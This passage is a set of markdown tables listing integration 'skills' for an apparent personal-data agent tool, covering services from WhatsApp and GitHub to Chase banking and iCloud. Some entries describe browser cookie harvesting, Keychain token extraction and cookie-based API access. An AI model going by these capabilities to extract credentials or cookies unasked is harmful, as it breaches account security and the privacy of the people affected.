| `whatsapp` | message, conversation, person | WhatsApp history |
| `reddit` | post, forum | Posts and comments from Reddit |
| `hackernews` | post | Stories, comments, and discussions |
| `facebook` | post | Facebook community posts |
Media & Content
| Skill | Entities | What it does |
|---|---|---|
| `youtube` | video, channel, post | Video metadata, transcripts, and comments |
| `moltbook` | book | Book metadata and reading lists |
| `goodreads` | book, review, shelf | Goodreads library, reviews, and social reading |
Developer Tools
| Skill | Entities | What it does |
|---|---|---|
| `github` | — | GitHub repos, issues, PRs |
| `git` | — | Local git operations |
| `cursor` | document | Research reports from Cursor sub-agents |
| `posthog` | — | Product analytics |
Finance & Commerce
| Skill | Entities | What it does |
|---|---|---|
| `amazon` | product, order | Amazon orders and product data |
| `chase` | — | Chase bank account data |
| `copilot-money` | — | Financial tracking |
AI & APIs
| Skill | Entities | What it does |
|---|---|---|
| `claude` | — | Claude.ai web API (cookie-based) |
| `anthropic-api` | — | Anthropic API (key-based) |
| `openrouter` | — | Multi-model routing |
| `ollama` | — | Local LLM inference |
Browser & System
| Skill | Entities | What it does |
|---|---|---|
| `playwright` | — | Browser control via CDP — discovery and reverse engineering tool |
| `brave-browser` | webpage, history | Browser history and cookie provider |
| `firefox` | — | Firefox cookie provider |
| `macos-control` | — | macOS automation (windows, apps, screenshots) |
| `macos-security` | — | Keychain audit, token extraction, Google OAuth app scanning |
| `kitty` | — | Kitty terminal control |
| `raycast` | — | Raycast extension control |
Other
| Skill | Entities | What it does |
|---|---|---|
| `mimestream` | — | OAuth token provider (Google) |
| `here-now` | — | Location-aware context |
| `granola` | — | Meeting notes and transcripts |
| `porkbun` | — | Domain management |
| `gandi` | — | Domain management |
| `logo-dev` | — | Logo/brand image lookup |
| `austin-boulder-project` | — | Climbing gym schedules |
| `icloud` | — | iCloud data access |